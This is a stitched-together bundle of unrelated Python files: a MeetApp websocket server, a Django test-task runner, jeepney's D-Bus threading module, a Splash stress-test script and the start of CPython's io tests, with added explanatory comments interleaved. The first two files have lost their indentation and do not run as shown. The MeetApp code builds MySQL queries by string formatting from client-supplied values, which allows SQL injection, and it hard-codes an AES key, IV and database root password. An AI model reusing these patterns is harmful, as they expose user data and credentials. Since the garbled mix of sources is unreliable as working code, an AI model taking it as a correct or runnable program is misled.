req['sender'] = sender
req['type'] = "locationInfo"
req = json.dumps(req)
for i in range(0,len(activeUsers)):
print activeUsers[i].keys()[0]
if(activeUsers[i].keys()[0] == send_to): # Don't do ping-pong; send directly to the receiver if online
tempDict = activeUsers[i]
socket = tempDict[send_to]
try:
socket.write_message(aes.encrypt(req))
except:
print "WARN: SOCKET_CLOSED"
if DEBUG:
print "Sent locationUpdate to: ", send_to
break
else:
pass
def onTripFinishRequest(req):
if req['type'] == "tripFinish":
sender = getFullRegisteredNumberFrom(req['from'])
send_to = getFullRegisteredNumberFrom(req['to'])
for i in range(0,len(activeUsers)):
print activeUsers[i].keys()[0]
if(activeUsers[i].keys()[0] == send_to): # Don't do ping-pong; send directly to the receiver if online
tempDict = activeUsers[i]
socket = tempDict[send_to]
req = json.dumps(req)
try:
socket.write_message(aes.encrypt(req))
except:
print "WARN: SOCKET_CLOSED"
if DEBUG:
print "Sent locationUpdate to: ", send_to
break
else:
pass
def checkIfOnline(number):
e164Number = number
number = str(number[-10:])
sendPingTo(number)
startWaitForPongThread(number, e164Number)
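# Summary of the presence-check flow implemented by the functions around here (added
# as an explanatory note, not original code):
#   1. checkIfOnline() sends an encrypted {'from': 'server', 'type': 'ping'} frame to
#      the client's websocket, if one is registered in activeUsers.
#   2. startWaitForPongThread() starts a thread (named after the number) that waits
#      up to PONG_TIMEOUT seconds.
#   3. If a 'pong' arrives, onPong() stops that thread and sendToPonger() flushes any
#      stored messages from store_and_fwd_table to the client.
#   4. If the timeout expires, the number is added to offlineClientNumbers and, when
#      PUSH_ENABLE is set, pushOpenToDevice() sends an FCM data push
#      ({"pushType": "open"}), presumably to wake the app so it reconnects.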
def onPong(resp,socket):
if(resp['type'] == "pong"):
number = phoneNumberFormatter(str(resp['from']))
for thread in threading.enumerate():
#if thread.name == number:
if(number.find(thread.name) > -1):
thread.run = False
sendToPonger(number,socket)
def sendToPonger(number,socket):
db.execute("use meetapp_server")
db.execute("select _id, message from store_and_fwd_table where send_to='%s'" % number)
results = db.fetchall()
for i in range(0,len(results)):
if USE_PYMYSQL:
_id = results[i]['_id']
msg = results[i]['message']  # column is named 'message' in store_and_fwd_table
else:
_id = results[i][0]
msg = results[i][1]
socket.write_message(aes.encrypt(msg))
db.execute("delete from store_and_fwd_table where _id=%d" % _id)
#con.commit()
if DEBUG:
print "Sending stored messages to ponger: %s" % number
def sendPingTo(number):
lenghtOfActiveUsers = len(activeUsers)
for i in range(0,lenghtOfActiveUsers):
#if(activeUsers[i].keys()[0] == str(number)):
if(activeUsers[i].keys()[0].find(str(number)) > -1):
number = str(activeUsers[i].keys()[0])
tempDict = activeUsers[i]
socket = tempDict[str(number)]
pingFrame = {'from':'server','type':'ping'}
socket.write_message(aes.encrypt(json.dumps(pingFrame)))
if DEBUG:
print "Sent ping to: " + str(number)
def registerAsOffline(number):
if number in offlineClientNumbers:
pass
else:
offlineClientNumbers.append(str(number))
def startWaitForPongThread(number,e164number):
number = str(number)
e164number = str(e164number)
t = threading.Thread(target=waitingThread, name=number, args=(number,e164number,))
t.start()
def waitingThread(number,e164number):
if DEBUG:
print "Started waiting thread for pong from: %s" % number
t = threading.current_thread()
timeCnt = 0
while(timeCnt < PONG_TIMEOUT and getattr(t,'run',True)):
time.sleep(1)
timeCnt += 1
print "TIME_CNT: " + str(timeCnt) + "\tPONG_TIMEOUT: " + str(PONG_TIMEOUT)
if(timeCnt == PONG_TIMEOUT):
registerAsOffline(number)
if PUSH_ENABLE:
pushOpenToDevice(e164number)
if DEBUG:
print "Waiting thread expired - Adding to offline list: %s" % number
else:
if number in offlineClientNumbers:
offlineClientNumbers.remove(number)
if DEBUG:
print "Pong recived from: %s" % number
def onMeetingRequest(req):
if(req['type'] == 'immidiet' or req['type'] == 'scheduled'):
sent_from = phoneNumberFormatter(str(req['from']))
send_to = getFullRegisteredNumberFrom(phoneNumberFormatter(str(req['to'])))
msg = str(req)
now = str(datetime.datetime.now().strftime("%d/%m/%y %I:%M:%S"))
expiry = str(getMsgExpiryDate(datetime.datetime.now()))
db.execute("use meetapp_server")
db.execute("insert into store_and_fwd_table (arrive_timestamp, expire_timestamp, send_to, sent_from, message) values ('%s', '%s', '%s', '%s', \"%s\")" % (now, expiry, send_to, sent_from, msg))
#con.commit()
checkIfOnline(send_to)
def onMeetingRequestResponse(resp):
if(resp['type'] == 'meetingRequestResponse'):
sent_from = phoneNumberFormatter(str(resp['from']))
send_to = getFullRegisteredNumberFrom(phoneNumberFormatter(str(resp['to'])))
msg = str(resp)
msg = ast.literal_eval(msg)
msg['to'] = send_to
msg = json.dumps(msg)
msg = str(msg).replace("\"","\'")
now = str(datetime.datetime.now().strftime("%d/%m/%y %I:%M:%S"))
expiry = str(getMsgExpiryDate(datetime.datetime.now()))
db.execute("use meetapp_server")
db.execute("insert into store_and_fwd_table (arrive_timestamp, expire_timestamp, send_to, sent_from, message) values ('%s', '%s', '%s', '%s', \"%s\")" % (now, expiry, send_to, sent_from, msg))
#con.commit()
checkIfOnline(send_to)
def pushOpenToDevice(number):
fcm_token = getFCMIdOfUser(number)
result = fcm.notify_single_device(registration_id=fcm_token, data_message=push_open, restricted_package_name=ANDROID_PACKAGE_NAME)
if DEBUG:
print "Sent open push to: " + number
##### WebSocketHandler class #####
class WSHandler(tornado.websocket.WebSocketHandler):
def open(self):
global NO_OF_CONNECTIONS
NO_OF_CONNECTIONS += 1
self.timeout = tornado.ioloop.IOLoop.current().add_timeout(datetime.timedelta(minutes=CONNECTION_CLOSE_TIMEOUT), self.timeout_close)
if DEBUG:
print "New connection: " + self.request.remote_ip
print "No of connections: " + str(NO_OF_CONNECTIONS)
def on_message(self,message):
global activeUsers
msg = aes.decrypt(message)
msg = ast.literal_eval(msg)
onOpen(msg,self)
onRegisterUserRequest(msg)
onContactSyncRequest(msg,self)
onPong(msg,self)
onMeetingRequest(msg)
onMeetingRequestResponse(msg)
onTripLocationUpdateReceive(msg)
onTripFinishRequest(msg)
onUpdateTokenRequest(msg)
onDeleteAccountRequest(msg)
if SHOW_RAW_MSGS:
print msg
def on_error(self, error):
print "Websocket error: " + str(error)
self.close()
def on_close(self):
global NO_OF_CONNECTIONS
if NO_OF_CONNECTIONS > 0:
NO_OF_CONNECTIONS -= 1
if DEBUG:
print "No of connections: " + str(NO_OF_CONNECTIONS)
print "Connection closed by " + self.request.remote_ip
def timeout_close(self):
global NO_OF_CONNECTIONS
NO_OF_CONNECTIONS -= 1
if DEBUG:
print "Connection timeout - Closing -->: %s" % self.request.remote_ip
print "No. of open connections: %d" % NO_OF_CONNECTIONS
self.close()
class MeetAppSecurity:
def __init__(self):
self.key = "MeetAppSecretKey"
self.iv = "alohomora2unlock"
self.block_size = AES.block_size
def pad(self,plain_text):
number_of_bytes_to_pad = self.block_size - len(plain_text) % self.block_size
ascii_string = chr(number_of_bytes_to_pad)
padding_str = number_of_bytes_to_pad * ascii_string
padded_plain_text = plain_text + padding_str
return padded_plain_text
def unpad(self,s):
return s[0:-ord(s[-1])]
def encrypt(self,raw):
cipher = AES.new(self.key, AES.MODE_CBC, self.iv)
raw = self.pad(raw)
e = cipher.encrypt(raw)
return base64.b64encode(e)
def decrypt(self,enc):
decipher = AES.new(self.key, AES.MODE_CBC, self.iv)
enc = base64.b64decode(enc)
return self.unpad(decipher.decrypt(enc))
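# Hedged example (not part of the original server and never called by it): a define-only
# sketch of the MeetAppSecurity round trip, assuming the PyCrypto-style AES import used
# above and the hard-coded 16-byte key/IV.
def _meetapp_security_roundtrip_example():
    demo = MeetAppSecurity()
    token = demo.encrypt("hello world")   # base64-encoded AES-CBC ciphertext
    plain = demo.decrypt(token)           # unpad() strips the PKCS#7-style padding
    assert plain == "hello world"
    return token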
class MeetAppDatabase():
con = None
cursor = None
def connect(self):
self.con = mdb.connect(host="localhost",user=DB_USER,passwd=DB_PASSWD,db=DB_NAME)
self.cursor = self.con.cursor()
def execute(self, query):
try:
self.cursor.execute(query)
self.con.commit()
except (mdb.OperationalError, AttributeError):
print "Database Exception -- Reconnecting..."
self.connect()
self.cursor.execute(query)
self.con.commit()
def fetchone(self):
return self.cursor.fetchone()
def fetchall(self):
return self.cursor.fetchall()
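# Hedged usage sketch (hypothetical query, not part of the original server): the wrapper
# reconnects transparently when the MySQL connection has gone away, so callers issue
# execute()/fetch*() without handling OperationalError themselves. Define-only.
def _meetapp_database_example():
    demo_db = MeetAppDatabase()
    demo_db.connect()
    demo_db.execute("select registered_number from registration_table")
    return demo_db.fetchall()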
#### Helper functions ####
def phoneNumberFormatter(number): # Phone number string cleaner
number = str(number)
number = number.replace(" ","")
number = number.replace(")","")
number = number.replace("(","")
number = number.replace("-","")
number = number.replace("_","")
return number
def getMsgExpiryDate(datetime): # store_and_fwd expiry calculator
try:
datetime = datetime.replace(month=(datetime.month+1))
    except ValueError:
datetime = datetime.replace(year=datetime.year+1,month=1)
return datetime.strftime("%d/%m/%y %H:%M:%S")
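# Hedged example (not part of the original server): getMsgExpiryDate() returns a timestamp
# one month ahead, with the except branch above handling the December rollover. Define-only.
def _msg_expiry_example():
    return getMsgExpiryDate(datetime.datetime(2023, 12, 5))  # -> "05/01/24 00:00:00"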
def reasignAutoIncrementOfStoreAndFwd(): # auto_increment maintainer
db.execute("use meetapp_server")
db.execute("alter table store_and_fwd_table drop _id")
db.execute("alter table store_and_fwd_table auto_increment=1")
db.execute("alter table store_and_fwd_table add _id BIGINT NOT NULL AUTO_INCREMENT PRIMARY KEY FIRST")
#con.commit()
def reasignAutoIncrementOfRegistrationTable():
db.execute("use meetapp_server")
db.execute("alter table registration_table drop _id")
db.execute("alter table registration_table auto_increment=1")
db.execute("alter table registration_table add _id BIGINT NOT NULL AUTO_INCREMENT PRIMARY KEY FIRST")
def getFullRegisteredNumberFrom(number): # Gives country_code + number for given only number
number = str(number[-10:])
db.execute("use meetapp_server")
db.execute("select registered_number from registration_table where registered_number like '%{}%'".format(str(number)))
result = db.fetchone()
if USE_PYMYSQL:
result = result['registered_number']
if DEBUG:
print "NUMBER: " + str(number)
print "RESULT: " + str(result)
try:
return result[0]
except:
return None
def getFCMIdOfUser(number):
number = phoneNumberFormatter(number)
db.execute("use meetapp_server")
db.execute("select fcm_token from registration_table where registered_number=%s" % number)
result = db.fetchone()
try:
if USE_PYMYSQL:
return result['fcm_token']
else:
return result[0]
except Exception as q:
raise q
#### Main program ####
### Database connection ###
try:
if not USE_PYMYSQL:
print "Using MySQLdb..."
#con = mdb.connect("localhost",DB_USER,DB_PASSWD)
#con.ping(True)
#db = con.cursor()
db = MeetAppDatabase()
else:
print "Using PyMySQL..."
con = pymysql.connect(host="localhost",
user="root",
password="linux",
db="meetapp_server",
charset="utf8mb4",
cursorclass=pymysql.cursors.DictCursor)
db = con.cursor()
except Exception as e:
raise e
sys.exit("Error connecting MySQL database")
### FCM Push service ###
try:
fcm = FCMNotification(api_key=FCM_KEY)
except Exception as e:
raise e
    sys.exit("Failed to init FCM PUSH SERVICE")
app = tornado.web.Application([
(r'/',WSHandler),
])
if __name__ == "__main__":
try:
os.system("clear")
### Security constructor ###
aes = MeetAppSecurity()
print "\n\r[ MeetApp ]"
print "Started at: " + time.strftime("%d/%m/%y %I:%M:%S %p")
print "IP Address: " + str(os.popen("hostname -I").read())
if USE_PYMYSQL:
print "Using PyMySQL..."
else:
print "Using MySQLdb..."
initDB()
reasignAutoIncrementOfStoreAndFwd()
reasignAutoIncrementOfRegistrationTable()
try:
http_server = tornado.httpserver.HTTPServer(app)
http_server.listen(PORT)
myIP = socket.gethostbyname(socket.gethostname())
print "Starting tornado socket server at %s:%s\n" % (str(os.popen("hostname -I").read().replace('\n','')),PORT)
tornado.ioloop.IOLoop.instance().start()
except Exception as e:
raise e
sys.exit("\noops! Tornado exception occured!")
except(KeyboardInterrupt):
sys.exit("KeyboardInterrupt.. exiting..")
|
task_thread.py
|
import os
import json
import threading
import time
from time import sleep
from xml.dom.minidom import parse
from backend.settings import BASE_DIR
from app_api.models import TestCase, TestTask, TaskCaseRelevance, TestResult
from app_api.tasks import running
# Test data file
DATA_FILE_PATH = os.path.join(BASE_DIR, "app_api", "data", "test_data.json")
# Test report file
REPORT_PATH = os.path.join(BASE_DIR, "app_api", "data", "report.xml")
class TaskThread:
def __init__(self, task_id, cases):
self.tid = task_id
self.cases = cases
def run_cases(self):
        # 1. Read the test cases and write them to the test data file
        print("1. Reading test cases and writing the test data file")
cases_dict = {}
for case in self.cases:
case = TestCase.objects.get(id=case)
cases_dict["case" + str(case.id)] = {
"url": case.url,
"method": case.method,
"header": case.header,
"params_type": case.params_type,
"params_body": case.params_body,
"assert_type": case.assert_type,
"assert_text": case.assert_text
}
cases_json = json.dumps(cases_dict)
        with open(DATA_FILE_PATH, "w") as f:
f.write(cases_json)
        # 3. Run the test case file; it generates the result.xml report
        print("3. Before running cases --->", time.ctime())
running.delay()
# os.system()
print("3.运行用例后---》", time.ctime())
# 4. 读取report.xml文件,把这里面的结果放到表里面。
print("4. 读取report.xml文件")
self.save_result()
print("4. 保存完成")
# 5. 任务->已执行
print("5.任务->已执行")
TestTask.objects.select_for_update().filter(id=self.tid).update(status=2)
def save_result(self):
"""
保存测试结果到数据库
"""
        # Open the XML report
dom = parse(REPORT_PATH)
        # Get the document root element
root = dom.documentElement
        # Get the (group of) testsuite tags
testsuite = root.getElementsByTagName('testsuite')
errors = testsuite[0].getAttribute("errors")
failures = testsuite[0].getAttribute("failures")
name = testsuite[0].getAttribute("name")
skipped = testsuite[0].getAttribute("skipped")
tests = testsuite[0].getAttribute("tests")
run_time = testsuite[0].getAttribute("time")
f = open(REPORT_PATH, "r", encoding="utf-8")
result = f.read()
f.close()
TestResult.objects.create(
task_id=self.tid,
name=name,
error=int(errors),
failure=int(failures),
skipped=int(skipped),
tests=int(tests),
run_time=float(run_time),
result=result
)
def run_tasks(self):
print("创建线程任务...")
sleep(2)
threads = []
t1 = threading.Thread(target=self.run_cases)
threads.append(t1)
for t in threads:
t.start()
for t in threads:
t.join()
def run(self):
threads = []
t = threading.Thread(target=self.run_tasks)
threads.append(t)
for t in threads:
t.start()
if __name__ == '__main__':
print("开始")
# run() # 丢给线程去运行任务
TaskThread(1, [1, 2]).run()
print("结束")
#上班 ....
#(下班)接孩子
|
threading.py
|
"""Synchronous IO wrappers with thread safety
"""
from concurrent.futures import Future
from contextlib import contextmanager
import functools
import os
from selectors import EVENT_READ
import socket
from queue import Queue, Full as QueueFull
from threading import Lock, Thread
from typing import Optional
from jeepney import Message, MessageType
from jeepney.bus import get_bus
from jeepney.bus_messages import message_bus
from jeepney.wrappers import ProxyBase, unwrap_msg
from .blocking import (
unwrap_read, prep_socket, DBusConnectionBase, timeout_to_deadline,
)
from .common import (
MessageFilters, FilterHandle, ReplyMatcher, RouterClosed, check_replyable,
)
__all__ = [
'open_dbus_connection',
'open_dbus_router',
'DBusConnection',
'DBusRouter',
'Proxy',
'ReceiveStopped',
]
class ReceiveStopped(Exception):
pass
class DBusConnection(DBusConnectionBase):
def __init__(self, sock: socket.socket, enable_fds=False):
super().__init__(sock, enable_fds=enable_fds)
self._stop_r, self._stop_w = os.pipe()
self.stop_key = self.selector.register(self._stop_r, EVENT_READ)
self.send_lock = Lock()
self.rcv_lock = Lock()
def send(self, message: Message, serial=None):
"""Serialise and send a :class:`~.Message` object"""
data, fds = self._serialise(message, serial)
with self.send_lock:
if fds:
self._send_with_fds(data, fds)
else:
self.sock.sendall(data)
def receive(self, *, timeout=None) -> Message:
"""Return the next available message from the connection
If the data is ready, this will return immediately, even if timeout<=0.
Otherwise, it will wait for up to timeout seconds, or indefinitely if
timeout is None. If no message comes in time, it raises TimeoutError.
If the connection is closed from another thread, this will raise
ReceiveStopped.
"""
deadline = timeout_to_deadline(timeout)
if not self.rcv_lock.acquire(timeout=(timeout or -1)):
raise TimeoutError(f"Did not get receive lock in {timeout} seconds")
try:
return self._receive(deadline)
finally:
self.rcv_lock.release()
def _read_some_data(self, timeout=None):
# Wait for data or a signal on the stop pipe
for key, ev in self.selector.select(timeout):
if key == self.select_key:
if self.enable_fds:
return self._read_with_fds()
else:
return unwrap_read(self.sock.recv(4096)), []
elif key == self.stop_key:
raise ReceiveStopped("DBus receive stopped from another thread")
raise TimeoutError
def interrupt(self):
"""Make any threads waiting for a message raise ReceiveStopped"""
os.write(self._stop_w, b'a')
def reset_interrupt(self):
"""Allow calls to .receive() again after .interrupt()
To avoid race conditions, you should typically wait for threads to
respond (e.g. by joining them) between interrupting and resetting.
"""
# Clear any data on the stop pipe
while (self.stop_key, EVENT_READ) in self.selector.select(timeout=0):
os.read(self._stop_r, 1024)
def close(self):
"""Close the connection"""
self.interrupt()
super().close()
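# Hedged sketch (not part of jeepney; the helper below is hypothetical and define-only):
# how interrupt() and reset_interrupt() are meant to pair up when a dedicated thread
# blocks in receive(), per the docstrings above.
def _interrupt_example(conn: 'DBusConnection'):
    def pump():
        try:
            while True:
                conn.receive()      # blocks until a message arrives or interrupt()
        except ReceiveStopped:
            pass                    # another thread asked us to stop
    t = Thread(target=pump)
    t.start()
    conn.interrupt()                # wake the receiver thread
    t.join()                        # wait for it to exit, then it is safe to...
    conn.reset_interrupt()          # ...allow receive() calls again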
def open_dbus_connection(bus='SESSION', enable_fds=False, auth_timeout=1.):
"""Open a plain D-Bus connection
D-Bus has an authentication step before sending or receiving messages.
This takes < 1 ms in normal operation, but there is a timeout so that client
code won't get stuck if the server doesn't reply. *auth_timeout* configures
this timeout in seconds.
:return: :class:`DBusConnection`
"""
bus_addr = get_bus(bus)
sock = prep_socket(bus_addr, enable_fds, timeout=auth_timeout)
conn = DBusConnection(sock, enable_fds)
with DBusRouter(conn) as router:
reply_body = Proxy(message_bus, router, timeout=10).Hello()
conn.unique_name = reply_body[0]
return conn
class DBusRouter:
"""A client D-Bus connection which can wait for replies.
This runs a separate receiver thread and dispatches received messages.
It's possible to wrap a :class:`DBusConnection` in a router temporarily.
Using the connection directly while it is wrapped is not supported,
but you can use it again after the router is closed.
"""
def __init__(self, conn: DBusConnection):
self.conn = conn
self._replies = ReplyMatcher()
self._filters = MessageFilters()
self._rcv_thread = Thread(target=self._receiver, daemon=True)
self._rcv_thread.start()
@property
def unique_name(self):
return self.conn.unique_name
def send(self, message, *, serial=None):
"""Serialise and send a :class:`~.Message` object"""
self.conn.send(message, serial=serial)
def send_and_get_reply(self, msg: Message, *, timeout=None) -> Message:
"""Send a method call message, wait for and return a reply"""
check_replyable(msg)
if not self._rcv_thread.is_alive():
raise RouterClosed("This D-Bus router has stopped")
serial = next(self.conn.outgoing_serial)
with self._replies.catch(serial, Future()) as reply_fut:
self.conn.send(msg, serial=serial)
return reply_fut.result(timeout=timeout)
def close(self):
"""Close this router
This does not close the underlying connection.
"""
self.conn.interrupt()
self._rcv_thread.join(timeout=10)
self.conn.reset_interrupt()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
return False
    def filter(self, rule, *, queue: Optional[Queue] = None, bufsize=1):
"""Create a filter for incoming messages
Usage::
with router.filter(rule) as queue:
matching_msg = queue.get()
:param jeepney.MatchRule rule: Catch messages matching this rule
:param queue.Queue queue: Matched messages will be added to this
:param int bufsize: If no queue is passed in, create one with this size
"""
return FilterHandle(self._filters, rule, queue or Queue(maxsize=bufsize))
# Code to run in receiver thread ------------------------------------
def _dispatch(self, msg: Message):
if self._replies.dispatch(msg):
return
for filter in self._filters.matches(msg):
try:
filter.queue.put_nowait(msg)
except QueueFull:
pass
def _receiver(self):
try:
while True:
msg = self.conn.receive()
self._dispatch(msg)
except ReceiveStopped:
pass
finally:
# Send errors to any tasks still waiting for a message.
self._replies.drop_all()
class Proxy(ProxyBase):
"""A blocking proxy for calling D-Bus methods via a :class:`DBusRouter`.
You can call methods on the proxy object, such as ``bus_proxy.Hello()``
to make a method call over D-Bus and wait for a reply. It will either
return a tuple of returned data, or raise :exc:`.DBusErrorResponse`.
The methods available are defined by the message generator you wrap.
You can set a time limit on a call by passing ``_timeout=`` in the method
call, or set a default when creating the proxy. The ``_timeout`` argument
is not passed to the message generator.
    All timeouts are in seconds, and :exc:`TimeoutError` is raised if it
expires before a reply arrives.
:param msggen: A message generator object
:param ~threading.DBusRouter router: Router to send and receive messages
:param float timeout: Default seconds to wait for a reply, or None for no limit
"""
def __init__(self, msggen, router, *, timeout=None):
super().__init__(msggen)
self._router = router
self._timeout = timeout
def __repr__(self):
extra = '' if (self._timeout is None) else f', timeout={self._timeout}'
return f"Proxy({self._msggen}, {self._router}{extra})"
def _method_call(self, make_msg):
@functools.wraps(make_msg)
def inner(*args, **kwargs):
timeout = kwargs.pop('_timeout', self._timeout)
msg = make_msg(*args, **kwargs)
assert msg.header.message_type is MessageType.method_call
reply = self._router.send_and_get_reply(msg, timeout=timeout)
return unwrap_msg(reply)
return inner
@contextmanager
def open_dbus_router(bus='SESSION', enable_fds=False):
"""Open a D-Bus 'router' to send and receive messages.
Use as a context manager::
with open_dbus_router() as router:
...
On leaving the ``with`` block, the connection will be closed.
:param str bus: 'SESSION' or 'SYSTEM' or a supported address.
:param bool enable_fds: Whether to enable passing file descriptors.
:return: :class:`DBusRouter`
"""
with open_dbus_connection(bus=bus, enable_fds=enable_fds) as conn:
with DBusRouter(conn) as router:
yield router
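# Hedged usage sketch (not part of jeepney itself; assumes a running session bus and is
# define-only): open a router, wrap the standard message-bus address in a Proxy and make
# a blocking call with a per-proxy timeout.
def _router_usage_example():
    with open_dbus_router(bus='SESSION') as router:
        bus = Proxy(message_bus, router, timeout=5)
        names, = bus.ListNames()    # blocking call; the reply body is a 1-tuple
        return names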
|
stress.py
|
import sys, random, optparse, time, json
from itertools import islice
from threading import Thread
from collections import Counter
from queue import Queue
import requests
from .utils import SplashServer, MockServer
class StressTest():
def __init__(self, reqs, host="localhost:8050", requests=1000, concurrency=50, shuffle=False, verbose=False):
self.reqs = reqs
self.host = host
self.requests = requests
self.concurrency = concurrency
self.shuffle = shuffle
self.verbose = verbose
def run(self):
args = list(islice(self.reqs, self.requests))
if self.shuffle:
random.shuffle(args)
print("Total requests: %d" % len(args))
print("Concurrency : %d" % self.concurrency)
starttime = time.time()
q, p = Queue(), Queue()
for _ in range(self.concurrency):
t = Thread(target=worker, args=(self.host, q, p, self.verbose))
t.daemon = True
t.start()
for a in args:
q.put(a)
q.join()
outputs = []
for _ in range(self.requests):
outputs.append(p.get())
elapsed = time.time() - starttime
print()
print("Total requests: %d" % len(args))
print("Concurrency : %d" % self.concurrency)
print("Elapsed time : %.3fs" % elapsed)
print("Avg time p/req: %.3fs" % (elapsed/len(args)))
print("Received (per status code or error):")
for c, n in Counter(outputs).items():
print(" %s: %d" % (c, n))
def worker(host, q, p, verbose=False):
url = "http://%s/render.html" % host
while True:
try:
args = q.get()
t = time.time()
r = requests.get(url, params=args)
t = time.time() - t
p.put(r.status_code)
if verbose:
print(". %d %.3fs %s" % (r.status_code, t, args))
else:
sys.stdout.write(".")
sys.stdout.flush()
except Exception as e:
p.put(type(e))
if verbose:
print("E %.3fs %s" % (t, args))
else:
sys.stdout.write("E")
sys.stdout.flush()
finally:
q.task_done()
class MockArgs(object):
ok_urls = 0.5
error_urls = 0.3
timeout_urls = 0.2
def __init__(self, requests=1000):
self.requests = requests
def _ok_urls(self):
url = ["http://localhost:8998/jsrender"]
return int(self.requests * self.ok_urls) * url
def _error_urls(self):
url = ["http://non-existent-host/"]
return int(self.requests * self.error_urls) * url
def _timeout_urls(self):
url = ["http://localhost:8998/delay?n=10&timeout=0.5"]
return int(self.requests * self.timeout_urls) * url
def __iter__(self):
ok_urls = self._ok_urls()
error_urls = self._error_urls()
timeout_urls = self._timeout_urls()
print("Expected codes: HTTP200x%d, HTTP502x%d, HTTP504x%d" % (
len(ok_urls), len(error_urls), len(timeout_urls)))
urls = ok_urls + error_urls + timeout_urls
return ({"url": x} for x in urls)
class ArgsFromUrlFile(object):
def __init__(self, urlfile):
self.urlfile = urlfile
def __iter__(self):
for line in open(self.urlfile):
url = line.rstrip()
if '://' not in url:
url = 'http://' + url
yield {"url": url, "timeout": 60}
class ArgsFromLogfile(object):
def __init__(self, logfile):
self.logfile = logfile
def __iter__(self):
for l in open(self.logfile):
if "[stats]" in l:
d = json.loads(l[33:].rstrip())
yield d['args']
def lua_runonce(script, timeout=60., splash_args=None, **kwargs):
""" Start splash server, execute lua script in it and return the output.
:type script: str
:param script: Script to be executed.
:type timeout: float
:param timeout: Timeout value for the execution request.
:param splash_args: Extra parameters for splash server invocation.
:type kwargs: dict
:param kwargs: Any other parameters are passed as arguments to the request
and will be available via ``splash.args``.
This function also starts a `MockServer`. If `url` kwarg has scheme=mock,
e.g., "mock://jsrender", it will be resolved as a url pointing to
corresponding mock server resource.
"""
if splash_args is None:
splash_args = ['--disable-lua-sandbox',
'--allowed-schemes=file,http,https', ]
with SplashServer(extra_args=splash_args) as s, MockServer() as ms:
if kwargs.get('url', '').startswith('mock://'):
kwargs['url'] = ms.url(kwargs['url'][7:])
params = {'lua_source': script}
params.update(kwargs)
resp = requests.get(s.url('execute'), params=params, timeout=timeout)
if resp.ok:
return resp.content
else:
raise RuntimeError(resp.text)
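# Hedged sketch (hypothetical script, not part of the original module): as the docstring
# above notes, a "mock://" url is rewritten to point at the embedded MockServer, so the
# define-only example below renders the mock /jsrender page.
def _lua_runonce_example():
    script = """
    function main(splash)
        assert(splash:go(splash.args.url))
        return splash:get_perf_stats()
    end
    """
    return lua_runonce(script, url="mock://jsrender", timeout=30.)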
def benchmark_png(url, viewport=None, wait=0.5, render_all=1,
width=None, height=None, nrepeats=3, timeout=60.):
f = """
function main(splash)
local resp, err = splash:go(splash.args.url)
assert(resp, err)
assert(splash:wait(tonumber(splash.args.wait)))
-- if viewport is 'full' it should be set only after waiting
if splash.args.viewport ~= nil and splash.args.viewport ~= "full" then
local w, h = string.match(splash.args.viewport, '^(%d+)x(%d+)')
if w == nil or h == nil then
error('Invalid viewport size format: ' .. splash.args.viewport)
end
splash:set_viewport_size(tonumber(w), tonumber(h))
end
local susage = splash:get_perf_stats()
local nrepeats = tonumber(splash.args.nrepeats)
local render_all = splash.args.render_all or splash.args.viewport == 'full'
local png, err
for i = 1, nrepeats do
png, err = splash:png{width=splash.args.width,
height=splash.args.height,
render_all=render_all}
assert(png, err)
end
local eusage = splash:get_perf_stats()
return {
wallclock_secs=(eusage.walltime - susage.walltime) / nrepeats,
maxrss=eusage.maxrss,
cpu_secs=(eusage.cputime - susage.cputime) / nrepeats,
png=png,
}
end
"""
return json.loads(lua_runonce(
f, url=url, width=width, height=height, render_all=render_all,
nrepeats=nrepeats, wait=wait, viewport=viewport, timeout=timeout))
def parse_opts():
op = optparse.OptionParser()
op.add_option("-H", dest="host", default="localhost:8050",
help="splash hostname & port (default: %default)")
op.add_option("-u", dest="urlfile", metavar="FILE",
help="read urls from FILE instead of using mock server ones")
op.add_option("-l", dest="logfile", metavar="FILE",
help="read urls from splash log file (useful for replaying)")
op.add_option("-s", dest="shuffle", action="store_true", default=False,
help="shuffle (randomize) requests (default: %default)")
op.add_option("-v", dest="verbose", action="store_true", default=False,
help="verbose mode (default: %default)")
op.add_option("-c", dest="concurrency", type="int", default=50,
help="concurrency (default: %default)")
op.add_option("-n", dest="requests", type="int", default=1000,
help="number of requests (default: %default)")
return op.parse_args()
def main():
opts, _ = parse_opts()
if opts.urlfile:
urls = ArgsFromUrlFile(opts.urlfile)
elif opts.logfile:
urls = ArgsFromLogfile(opts.logfile)
else:
urls = MockArgs(opts.requests)
t = StressTest(urls, opts.host, opts.requests, opts.concurrency, opts.shuffle, opts.verbose)
t.run()
if __name__ == "__main__":
main()
|
test_io.py
|
"""Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as an attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
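# A minimal sketch of that pattern (hypothetical class names, kept as a comment so it is
# not collected as a real test): the base class refers to the implementation only through
# attributes, and the C/Python variants just bind those attributes.
#
#     class ExampleTest:
#         def test_roundtrip(self):
#             buf = self.BytesIO()
#             buf.write(b"data")
#             self.assertEqual(buf.getvalue(), b"data")
#
#     class CExampleTest(ExampleTest, unittest.TestCase):
#         BytesIO = io.BytesIO
#
#     class PyExampleTest(ExampleTest, unittest.TestCase):
#         BytesIO = pyio.BytesIO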
import abc
import array
import errno
import locale
import os
import pickle
import random
import signal
import sys
import sysconfig
import threading
import time
import unittest
import warnings
import weakref
from collections import deque, UserList
from itertools import cycle, count
from test import support
from test.support.script_helper import assert_python_ok, run_python_until_end
from test.support import FakePath
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import ctypes
except ImportError:
def byteslike(*pos, **kw):
return array.array("b", bytes(*pos, **kw))
else:
def byteslike(*pos, **kw):
"""Create a bytes-like object having no string or sequence methods"""
data = bytes(*pos, **kw)
obj = EmptyStruct()
ctypes.resize(obj, len(data))
memoryview(obj).cast("B")[:] = data
return obj
class EmptyStruct(ctypes.Structure):
pass
_cflags = sysconfig.get_config_var('CFLAGS') or ''
_config_args = sysconfig.get_config_var('CONFIG_ARGS') or ''
MEMORY_SANITIZER = (
'-fsanitize=memory' in _cflags or
'--with-memory-sanitizer' in _config_args
)
# Does io.IOBase finalizer log the exception if the close() method fails?
# The exception is ignored silently by default in release build.
